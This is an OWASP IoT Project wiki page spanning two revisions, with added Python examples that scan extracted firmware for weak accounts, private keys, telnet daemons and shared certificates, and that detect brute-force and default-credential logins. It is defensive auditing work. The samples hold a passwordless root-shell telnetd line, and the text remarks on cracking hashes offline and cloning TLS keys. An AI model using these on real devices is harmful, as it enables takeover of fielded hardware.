* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
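The "File system analysis" step above, as an added example that is not part of the OWASP project, Firmwalker or any other tool listed here: a Python scan over an extracted root filesystem (what `binwalk -e` or the Firmware Modification Kit leaves behind) for the firmware vulnerabilities in the first row: passwordless or hashed accounts in /etc/passwd and /etc/shadow, private keys and certificates shipped in the image, a telnet daemon started from the boot configuration, and the same certificate reused across several images. The two sample images, their paths and the placeholder certificate bodies are constructed for the example.

```python
"""Scan an extracted firmware root filesystem for the findings listed above.

Added example (not part of the OWASP project or its tools): the paths,
regexes and sample images are constructed for illustration.
"""
import base64
import hashlib
import re
import tempfile
from pathlib import Path

PEM_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
PEM_CERT_RE = re.compile(rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
TELNET_RE = re.compile(rb"\b(?:u?telnetd)\b")
MAX_FILE = 4 * 1024 * 1024  # skip large blobs (kernel images, leftover squashfs)


def weak_accounts(data: bytes, rel: str):
    """Yield (user, problem) for suspicious entries in /etc/passwd or /etc/shadow."""
    for line in data.decode("utf-8", "replace").splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        user, secret = fields[0], fields[1]
        if secret == "":
            yield user, "empty password field: login needs no password"
        elif secret == "x" or secret.startswith(("*", "!")):
            continue  # hash lives in /etc/shadow, or the account is locked
        elif rel == "/etc/passwd":
            yield user, "password hash in world-readable /etc/passwd"
        else:
            yield user, "password hash present: crack offline, compare across images"


def scan_rootfs(root) -> list:
    """Return (category, path, detail) findings for one extracted root filesystem."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue
        try:
            if path.stat().st_size > MAX_FILE:
                continue
            data = path.read_bytes()
        except OSError:
            continue
        rel = "/" + path.relative_to(root).as_posix()
        if rel in ("/etc/passwd", "/etc/shadow"):
            for user, problem in weak_accounts(data, rel):
                findings.append(("credential", rel, f"{user}: {problem}"))
        if PEM_KEY_RE.search(data):
            findings.append(("private-key", rel, "PEM private key shipped in the image"))
        for m in PEM_CERT_RE.finditer(data):
            # SHA-256 over the DER body, i.e. the usual certificate fingerprint
            der = base64.b64decode(m.group(1))
            findings.append(("certificate", rel, hashlib.sha256(der).hexdigest()))
        if rel.startswith("/etc/") and TELNET_RE.search(data):
            findings.append(("service", rel, "telnet daemon referenced in boot config"))
    return findings


def shared_certificates(images: dict) -> dict:
    """Map fingerprint -> image names, for certificates seen in more than one image."""
    seen = {}
    for name, findings in images.items():
        for cat, _path, fp in findings:
            if cat == "certificate":
                seen.setdefault(fp, set()).add(name)
    return {fp: sorted(names) for fp, names in seen.items() if len(names) > 1}


# Constructed sample: two firmware images from the same product line.
# The certificate body is base64 of placeholder bytes, not real DER.
_CERT = ("-----BEGIN CERTIFICATE-----\n"
         + base64.b64encode(b"constructed placeholder, not a real certificate").decode()
         + "\n-----END CERTIFICATE-----\n")
_KEY = "-----BEGIN RSA PRIVATE KEY-----\nQUJD\n-----END RSA PRIVATE KEY-----\n"
SAMPLE_IMAGES = {
    "image_a": {
        "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\nadmin::0:0::/:/bin/sh\n",
        "/etc/shadow": "root:$1$c0nstr$placeholderhash:0:0:99999:7:::\ndaemon:*:0:0:99999:7:::\n",
        "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/usr/sbin/telnetd -l /bin/sh\n",
        "/etc/ssl/server.pem": _KEY + _CERT,
    },
    "image_b": {
        "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
        "/etc/shadow": "root:!:0:0:99999:7:::\n",
        "/etc/ssl/server.pem": _KEY + _CERT,
    },
}


def demo():
    """Write the constructed images to a temp dir, scan both, report shared certs."""
    with tempfile.TemporaryDirectory() as tmp:
        images = {}
        for name, files in SAMPLE_IMAGES.items():
            for rel, content in files.items():
                target = Path(tmp) / name / rel.lstrip("/")
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_text(content)
            images[name] = scan_rootfs(Path(tmp) / name)
    return images, shared_certificates(images)


if __name__ == "__main__":
    found, shared = demo()
    for name, findings in found.items():
        for f in findings:
            print(name, *f)
    print("certificates shared across images:", shared)
```

Run it against a real extraction by calling `scan_rootfs("/path/to/squashfs-root")`; the certificate fingerprints are what you compare across product lines to catch the "same certificate used on multiple devices" item, and any `private-key` hit next to a `certificate` hit means the TLS identity of every fielded unit can be cloned from one firmware download.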
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
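The event categories above as detection logic, added here as an example rather than the project's own code: a small stateful monitor that turns a stream of device log records into the named events (multiple failed passwords, high login rate, default administrative credentials, session source change, traffic from unenrolled or disenrolled devices). The record format, thresholds and enrollment lists are assumptions for the example; in particular the device reports whether a successful login used a factory-default credential rather than logging the password itself.

```python
"""Emit the logging events above from a stream of device log records.

Added example, not the OWASP project's own code: record fields, thresholds
and the enrollment lists are constructed for illustration.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

ENROLLED = {"sensor-01"}                # devices provisioned into the ecosystem
DISENROLLED = {"sensor-02"}             # devices that were decommissioned
FAILED_PW_THRESHOLD = 3                 # consecutive failures per (device, user)
RATE_WINDOW_S, RATE_THRESHOLD = 10, 5   # logins per device inside the window


@dataclass
class SecurityEvent:
    category: str
    name: str
    device: str
    detail: str


class IoTEventMonitor:
    """Stateful detector over authentication, session and traffic records."""

    def __init__(self):
        self.failures = defaultdict(int)   # (device, user) -> consecutive failures
        self.logins = defaultdict(deque)   # device -> recent login timestamps
        self.session_src = {}              # (device, session) -> first source seen

    def process(self, rec: dict) -> list:
        events = []
        dev, src, ts = rec["device"], rec["src"], rec["ts"]

        if dev in DISENROLLED:
            events.append(SecurityEvent("Ecosystem Membership Exceptions",
                                        "Traffic Seen from Disenrolled System", dev, src))
        elif dev not in ENROLLED:
            events.append(SecurityEvent("Ecosystem Membership Exceptions",
                                        "Traffic Seen from Unenrolled System", dev, src))

        if rec["event"] == "login":
            user = rec["user"]
            window = self.logins[dev]
            window.append(ts)
            while ts - window[0] > RATE_WINDOW_S:
                window.popleft()
            if len(window) == RATE_THRESHOLD:  # fire once, when the threshold is crossed
                events.append(SecurityEvent("Authentication Exceptions", "High Rate of Login Attempts",
                                            dev, f"{len(window)} logins in {RATE_WINDOW_S}s from {src}"))
            if rec["result"] == "fail":
                self.failures[(dev, user)] += 1
                if self.failures[(dev, user)] == FAILED_PW_THRESHOLD:
                    events.append(SecurityEvent("Authentication Exceptions", "Multiple Failed Passwords",
                                                dev, f"user {user} from {src}"))
            else:
                self.failures[(dev, user)] = 0
                # The device reports whether the matching credential was a factory
                # default; the password itself is never written to a log.
                if rec.get("credential") == "factory-default":
                    events.append(SecurityEvent("Administrative Mode Events",
                                                "Device Accessed Using Default Administrative Credentials",
                                                dev, f"user {user} from {src}"))
        elif rec["event"] == "request":
            key = (dev, rec["session"])
            first = self.session_src.setdefault(key, src)
            if first != src:
                events.append(SecurityEvent("Session Exceptions", "Source Location Changes During Session",
                                            dev, f"session {rec['session']} moved {first} -> {src}"))
        return events


# Constructed sample stream (timestamps in seconds).
SAMPLE_LOG = [
    {"ts": 0, "device": "sensor-01", "src": "10.0.0.5", "event": "login", "user": "admin", "result": "fail"},
    {"ts": 1, "device": "sensor-01", "src": "10.0.0.5", "event": "login", "user": "admin", "result": "fail"},
    {"ts": 2, "device": "sensor-01", "src": "10.0.0.5", "event": "login", "user": "admin", "result": "fail"},
    {"ts": 3, "device": "sensor-01", "src": "10.0.0.5", "event": "login", "user": "admin", "result": "ok",
     "credential": "factory-default"},
    {"ts": 4, "device": "sensor-01", "src": "10.0.0.5", "event": "login", "user": "tech", "result": "ok",
     "credential": "user-set"},
    {"ts": 5, "device": "sensor-01", "src": "10.0.0.5", "event": "request", "session": "s1", "path": "/api/status"},
    {"ts": 6, "device": "sensor-01", "src": "203.0.113.9", "event": "request", "session": "s1", "path": "/api/config"},
    {"ts": 7, "device": "sensor-09", "src": "10.0.0.7", "event": "request", "session": "s2", "path": "/api/status"},
    {"ts": 8, "device": "sensor-02", "src": "10.0.0.8", "event": "request", "session": "s3", "path": "/api/status"},
]


def run(records=SAMPLE_LOG) -> list:
    monitor = IoTEventMonitor()
    return [e for rec in records for e in monitor.process(rec)]


if __name__ == "__main__":
    for e in run():
        print(f"[{e.category}] {e.name}: device={e.device} {e.detail}")
```

The point of the design is that each emitted event carries the category and name from the table, so the same record stream can feed a SIEM rule or an AppSensor-style response; the rate detector fires once when the window crosses the threshold, which keeps a brute-force run from flooding the log with one event per attempt.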
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Event Logging Project? ==<br />
<br />
The IoT Event Logging Project provides a list of core events that should be logged by any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical, as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project: a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246176
OWASP Internet of Things Project
2018-12-19T23:24:56Z
<p>Aaron.guzman: /* Updated! */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
